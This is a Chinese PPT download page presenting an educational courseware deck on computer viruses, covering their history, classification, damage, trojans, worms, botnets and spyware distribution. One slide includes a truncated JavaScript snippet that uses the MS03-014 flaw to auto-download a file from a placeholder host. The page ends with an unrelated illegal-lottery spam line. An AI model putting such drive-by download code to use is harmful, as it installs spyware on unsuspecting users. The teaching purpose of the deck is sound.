排行榜 -

您的位置:首頁 > ppt下載 > PPT課件 > 課件PPT > 計算機病毒的ppt課件

計算機病毒的ppt課件下載

素材大小:
3.47 MB
素材授權:
免費下載
素材格式:
.ppt
素材上傳:
lipeier
上傳時間:
2019-08-06 15:54:57
素材編號:
237801
素材類別:
課件PPT
網友評分:

素材預覽

計算機病毒的ppt課件

這是計算機病毒的ppt課件,包括了計算機病毒的起源與發展,計算機病毒的定義與特征,計算機病毒的分類,計算機病毒的危害性,計算機病毒分析,其他惡意程序等內容,歡迎點擊下載。

計算機病毒的ppt課件是由紅軟PPT免費下載網推薦的一款課件PPT類型的PowerPoint.

計算機病毒 目 錄: 計算機病毒的起源與發展 計算機病毒的定義與特征 ★ 計算機病毒的分類 計算機病毒的危害性 計算機病毒分析 ★ 其他惡意程序 一個每天都要遇到的操作 可移動存儲設備的使用 一個每天都要遇到的操作 如果您的電腦配有攝像頭,在您使用完攝像頭后, 您會( ) 拔掉攝像頭,或者將攝像頭扭轉方向 (546人,44.1%) 無所謂 (693人,55.9%) 女鬼病毒 女鬼病毒在感染用戶系統后,會不定時的在電腦上出現恐怖的女鬼,并伴有陰森恐怖的鬼哭狼嚎的聲音。女鬼每次出現大約停留30秒鐘,低垂著腦袋,披頭散發,兩眼還射出紅光,加上陰森的恐怖之聲,使人在夜間開電腦時,不禁毛骨悚然,嚇到腿軟。 該女鬼病毒是用VB語言寫的程序,需要一個VB的動態鏈接庫,有些用戶系統上可能沒有這個文件,病毒因此就無法被激活。 木馬病毒 木馬,全稱為:特洛伊木馬(Trojan Horse)。 “特洛伊木馬”這一詞最早出先在希臘神話傳說中。相傳在3000年前,在一次希臘戰爭中。麥尼勞斯(人名)派兵討伐特洛伊(王國),但久攻不下。他們想出了一個主意:首先他們假裝被打敗,然后留下一個木馬。而木馬里面卻藏著最強悍的勇士!最后等時間一到,木馬里的勇士全部沖出來把敵人打敗了! “木馬”的含義就是把預謀的功能隱藏在公開的功能里,掩飾真正的企圖。 木馬其實就是那些盜號者所制造的一些惡意程序。 當木馬植入了你的電腦后,電腦就會被監控起來。輕者,偷取用戶資,會把你的QQ密碼.游戲帳號和密碼.等發給編寫病毒的人。 至于嚴重的,木馬制作者可以像操作自己的機器一樣控制您的機器,甚至可以遠程監控您的所有操作。一舉一動,都在別人的眼皮底下進行。 計算機病毒的發展史 自第一個真正意義上的計算機病毒于1983年走出實驗室以來,人們對它的認識經歷了“不以為然→談毒色變→口誅筆伐,人人喊打→理性對待,泰然處之”四個階段 。 計算機病毒產生的歷史 1977年:出現在科幻小說中 1983年: Fred Cohen:在計算機安全研討會上發布 1986年:巴基斯坦兩兄弟為追蹤非法拷貝其軟件的人制造了“巴基斯坦”病毒,成了世界上公認的第一個傳染PC兼容機的病毒,并且很快在全球流行。 1987年10月:美國發現世界上第一例病毒(Brain)。 1988年:小球病毒傳入我國,在幾個月之內迅速傳染了20 多個省、市,成為我國第一個病毒案例。 此后,如同打開的潘多拉的盒子,各種計算機病毒層出不窮! 計算機病毒的發展階段—萌芽階段 1 萌芽階段 1986年到1989年:計算機病毒的萌芽時期 病毒清除相對比較容易 特點: 攻擊目標單一 主要采取截取系統中斷向量的方式監控系統的運行狀態,并在一定的觸發條件下進行傳播 傳染后特征明顯 不具自我保護措施 計算機病毒的發展階段—綜合發展階段 2 綜合發展階段 1989年到1992年:由簡單到復雜,由原始走向成熟 特點: 攻擊目標趨于混合型 采用更為隱蔽的方法駐留內存 感染目標后沒有明顯的特征 開始采用自我保護措施 開始出現變種 計算機病毒的發展階段—成熟發展階段 3 成熟發展階段 1992到1995年:病毒開始具有多態性質。病毒每次傳染目標時,嵌入宿主程序中的病毒程序大部分可變種,正由于這個特點,傳統的特征碼檢測病毒法開始了新的探索研究。 在這個階段,病毒的發展主要集中在病毒技術的提高上,病毒開始向多維化方向發展,對反病毒廠商也提出了新的挑戰。 計算機病毒的發展階段—網絡病毒階段 4 網絡病毒階段 1995年到2000年:隨著網絡的普及,大量的病毒開始利用網絡傳播,蠕蟲開始大規模的傳播。由于網絡的便利和信息的共享,很快又出現了通過E-mail傳播的病毒。由于宏病毒編寫簡單、破壞性強、清除復雜,加上微軟未對WORD文檔結構公開,給清除宏病毒帶來了不便 這一階段的病毒,主要是利用網絡來進行傳播和破壞 計算機病毒的發展階段—迅速壯大的階段 5.迅速壯大的階段 2000年以后:成熟繁榮階段,計算機病毒的更新和傳播手段更加多樣性,網絡病毒的目的性也更強 出現了木馬,惡意軟件等特定目的的惡意程序 特點: 技術綜合利用,病毒變種速度大大加快 惡意軟件和病毒程序直接把矛頭對向了殺毒軟件 計算機病毒技術和反病毒技術的競爭進一步激化,反病毒技術也面臨著新的洗牌 計算機病毒的起源與發展 計算機病毒的定義與特征 ★ 計算機病毒的分類 計算機病毒的危害性 計算機病毒分析 ★ 其他惡意程序 計算機病毒的定義 狹義定義 計算機病毒是一種靠修改其它程序來插入或進行自身拷貝,從而感染其它程序的一種程序。 —— Fred Cohen博士對計算機病毒的定義。 廣義定義 能夠引起計算機故障,破壞計算機數據,影響計算機系統的正常使用的程序代碼。 我國定義 《中華人民共和國計算機信息系統安全保護條例》第二十八條: "計算機病毒,是指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數據,影響計算機使用,并能自我復制的一組計算機指令或者程序代碼。” 計算機病毒的特征 基本特征 傳染性 自我復制,通過多種渠道傳播 潛伏性 感染后不一定立刻發作 依附于其他文件、程序、介質,不被發現 可觸發性 觸發條件:日期、時間、文件類型 破壞性 破壞數據的完整性和可用性 破壞數據的保密性 系統和資源的可用性 非授權可執行性 計算機病毒的特征 其它特征 寄生性 寄生于其它文件、程序 隱蔽性 程序隱蔽、傳染隱蔽; 不易被發現 針對性* 針對特定的計算機、特定的操作系統 多態性* 每一次感染后改變形態,檢測更困難 持久性* 難于清除 計算機病毒的起源與發展 計算機病毒的定義與特征 ★ 計算機病毒的分類 計算機病毒的危害性 計算機病毒分析 ★ 其他惡意程序 計算機病毒的分類 按宿主分類 按危害分類 按傳播媒介分類 按攻擊平臺分類 計算機病毒的分類 按宿主分類 1)引導型病毒 主引導區 操作系統引導區 2)文件型病毒 操作系統 應用程序 宏病毒 3)復合型病毒 復合型病毒具有引導區型病毒和文件型病毒兩者的特征 計算機病毒的分類 按危害分類 良性病毒 如:小球病毒 惡性病毒 如:CIH病毒 計算機病毒的分類 按傳播媒介分類 單機病毒 DOS、Windows、Unix/Linux病毒等 網絡病毒 通過網絡或電子郵件傳播 計算機病毒的分類 按攻擊平臺分類 DOS病毒:MS-DOS及兼容操作系統上編寫的病毒 Windows病毒:Win32上編寫的純32位病毒程序 MAC病毒 Unix/Linux病毒 計算機病毒的起源與發展 計算機病毒的定義與特征 ★ 計算機病毒的分類 計算機病毒的危害性 計算機病毒分析 ★ 其他惡意程序 計算機病毒的危害性 攻擊系統數據區 攻擊部位包括硬盤主引導扇區、Boot扇區、FAT表、文件目錄 攻擊文件 刪除、改名、替換內容、丟失簇和對文件加密等 攻擊內存 內存是計算機的重要資源,也是病毒攻擊的重要目標 計算機病毒的危害性 干擾系統運行,使運行速度下降 如不執行命令、打不開文件 干擾內部命令的執行、擾亂串并接口、虛假報警、強制游戲 內部棧溢出、重啟動、死機 病毒激活時,系統時間延遲程序啟動,在時鐘中納入循環計數,迫使計算機空轉,運行速度明顯下降 干擾鍵盤、喇叭或屏幕,適用戶無法正常操作 響鈴、封鎖鍵盤、換字、抹掉緩存區字符、輸入紊亂等。 許多病毒運行時,會使計算機的喇叭發出響聲 病毒擾亂顯示的方式很多,如字符跌落、倒置、顯示前一屏、打開對話框、光標下跌、滾屏、抖動、亂寫等 計算機病毒的危害性 攻擊CMOS,破壞系統硬件 有的病毒激活時,能夠對CMOS進行寫入動作,破壞CMOS中的數據。例如CIH病毒破壞計算機硬件,亂寫某些主板BIOS芯片,損壞硬盤 干擾打印機 如假報警、間斷性打印或更換字符 干擾網絡正常運行 網絡病毒破壞網絡系統,非法使用網絡資源,破壞電子郵件,發送垃圾信息,占用網絡帶寬、阻塞網絡、造成拒絕服務等 歷年重大病毒影響情況 計算機病毒的起源與發展 計算機病毒的定義和特征 ★ 計算機病毒的分類 計算機病毒的危害性 計算機病毒分析 ★ 其他惡意程序 計算機病毒分析 計算機病毒的結構及工作機理 引導型病毒分析 文件型病毒分析 宏病毒分析 蠕蟲病毒分析 特洛伊木馬分析 實錄超牛病毒破壞電腦 世界最強電腦病毒 模擬實驗黑客入侵路由器 不到五秒獲取銀行卡號 ①計算機病毒的結構及工作機理 計算機病毒的結構 ①計算機病毒的結構及工作機理 引導過程 也就是病毒的初始化部分,它隨著宿主程序的執行而進入內存,為傳染部分做準備 傳染過程 作用是將病毒代碼復制到目標上去。一般病毒在對目標進行傳染前,要首先判斷傳染條件是否滿足,判斷病毒是否已經感染過該目標等,如CIH病毒只針對Windows 95/98操作系統 表現過程 是病毒間差異最大的部分,前兩部分是為這部分服務的。它破壞被傳染系統或者在被傳染系統的設備上表現出特定的現象。大部分病毒都是在一定條件下才會觸發其表現部分的 ②引導型病毒實例分析 引導型病毒 傳染機理 利用系統啟動的缺陷 傳染目標 硬盤的主引導區和引導區 軟盤的引導區 傳染途徑 通過軟盤啟動計算機 防治辦法 從C盤啟動 打開主板的方病毒功能 典型病毒 小球病毒、大麻病毒、火炬病毒、Anti-CMOS病毒 ②引導型病毒分析 引導型病毒——感染與執行過程 ③文件型病毒分析 文件型病毒 傳染機理:利用系統加載執行文件的缺陷 傳染目標:各種能夠獲得系統控制權執行的文件 傳染途徑:各種存儲介質、網絡、電子郵件 防治辦法 使用具有實時監控功能的殺毒軟件 不要輕易打開郵件附件 典型病毒 1575病毒、CIH病毒 ③文件型病毒分析 文件型病毒 文件型病毒與引導扇區病毒區別是:它攻擊磁盤上的文件 ③文件型病毒分析 文件型病毒——傳染機理 ④宏病毒分析 宏病毒 定義:宏病毒是指利用軟件所支持的宏命令或語言書寫的一段寄生在支持宏的文檔上的,具有復制、傳染能力的宏代碼 跨平臺式計算機病毒:可以在Windows 9X、Windows NT、OS/2和Unix、Mac等操作系統上執行病毒行為 影響系統的性能以及對文檔的各種操作,如打開、存儲、關閉或清除等 宏病毒對病毒而言是一次革命。現在通過E-mail、3W的互聯能力及宏語言的進一步強化,極大地增強了它的傳播能力 ④宏病毒分析 宏病毒——工作機理 ⑤蠕蟲病毒分析 蠕蟲病毒 一個獨立的計算機程序,不需要宿主 自我復制,自主傳播(Mobile) 占用系統或網絡資源、破壞其他程序 不偽裝成其他程序,靠自主傳播 利用系統漏洞; 利用電子郵件(無需用戶參與) ⑤蠕蟲病毒分析 蠕蟲病毒 傳染機理:利用系統或服務的漏洞 傳染目標:操作系統或應用服務 傳染途徑:網絡、電子郵件 防治辦法 使用具有實時監控功能的殺毒軟件 不要輕易打開郵件附件 打最新補丁,更新系統 典型病毒 RedCode,尼姆達、沖擊波等 ⑥特洛伊木馬分析 特洛伊木馬程序 名字來源:古希臘故事 通過偽裝成其他程序、有意隱藏自己惡意行為的程序,通常留下一個遠程控制的后門 沒有自我復制的功能 非自主傳播 用戶主動發送給其他人 放到網站上由用戶下載 ⑥特洛伊木馬分析 特洛伊木馬程序 傳播途徑 通過網絡下載、電子郵件 防治辦法 使用具有實時監控功能的殺毒軟件 不要輕易打開郵件附件 不要輕易運行來路不明的文件 典型例子 BO、BO2k、Subseven、冰河、廣外女生等 病毒、蠕蟲與木馬的比較 計算機病毒的起源與發展 計算機病毒的定義和特征 ★ 計算機病毒的分類 計算機病毒的危害性 計算機病毒分析 ★ 其他惡意程序 其他惡意程序 后門(Backdoor) 一種能讓黑客未經授權進入和使用本系統的惡意程序 僵尸(Bot) 一種集后門與蠕蟲一體的惡意程序. 通常使用IRC (Internet Relay Chat) 接受和執行黑客命令 廣告軟件/間諜軟件 ①后門 具有反偵測能力 隱藏文件, 進程, 網絡端口和連接, 系統設置, 系統服務 可以在惡意程序之中, 例如 Berbew;也有獨立軟件, 例如 Hackder Defender 為控制者提供遠程操作能力 ②僵尸 僵尸生態系統 僵尸 僵尸網 管理通道 看守者 從 MyDoom.A開始進入鼎盛期 打開后門 TCP port 3127 - 3198 下載和執行程序 利用被感染的計算機散發電子郵件 數以百萬計的感染計算機被出賣給了垃圾郵件的制造者 ②僵尸——僵尸網發展趨勢 1)源代碼可在網上免費下載 2)管理方式的變化: 過去: 集中管理 一個 IRC 服務器管理所有僵尸 關閉服務器就破壞了僵尸網 現在: 提升 注冊多個IRC 服務器 通訊加密 (AES-128 或更強) 今后: 分布式 (P2P)管理 對照分析: Napster: 集中管理, 容易被關閉 eDonkey: 分布式管理, 不容易被關閉 ③廣告軟件/間諜軟件 廣告軟件 彈出窗口及橫幅形式向用戶提供廣告服務 通常經過用戶授權 間諜軟件 未經授權收集用戶信息 未經授權上傳用戶信息 未經授權改變系統外表及行為 ③廣告軟件/間諜軟件——傳播方式 社會工程(欺騙)方法 非軟件或硬件漏洞 電子郵件:附屬可執行文件 電子郵件:隱蔽真實聯接 彈出窗口 偽裝網站 附屬于其它免費或商業軟件 利用瀏覽器瑕疵 自動下載及安裝 手段一: 虛假安全警告 手段二: “取消”實際為“是” 手段三: 重復 手段四: 附加安裝軟件 手段五:利用瀏覽器缺陷 一些瀏覽器缺陷可被利用繞過安全檢測和用戶提示,直接啟動惡意程序 例如,利用MS03-014缺陷自動下載及運行文件 { u='http://www.not-real-site.com/SpywareFile.chm'; document.write('

'); } 惡意程序族譜 惡意軟件發展趨勢 專業化 集病毒,蠕蟲,木馬,后門,廣告,間諜,惡意核心程序于一體。 只感染一小部分計算機, 以避免被發現。 有自動更新功能。 商業化 以前: 為制造轟動效應(上電臺報紙) 現在: 錢 (有組織犯罪) 散發出垃圾郵件 發動中斷服務襲擊

計算機財務管理ppt:這是計算機財務管理ppt,包括了運營資本最優規劃管理概述,運營資本最優決策的理論基礎——線性規劃的理論,最優決策分析工具——“規劃求解”工具,最優訂貨批量決策模型設計與分析,企業集團營運決策模型與案例分析等內容,歡迎點擊下載。

計算機硬件系統ppt:這是計算機硬件系統ppt,包括了學習目標,新課引入,信息處理過程,課堂練習,課堂小結,輸入設備,輸出設備,中央處理器等內容,歡迎點擊下載。

計算機二級ppt全套視頻:這是計算機二級ppt全套視頻,包括了基本數據結構與算法,程序設計基礎,軟件工程基礎,數據庫設計基礎,例題講解,數據結構研究的主要內容,基本概念和術語,線性結構和非線性結構等內容,歡迎點擊下載。

下載地址

推薦PPT

PPT分類Classification

Copyright:2009-2015 rsdown.cn Corporation,All Rights Reserved 紅軟PPT免費下載網版權所有

粵ICP備14102101號

海南私彩包码36组包中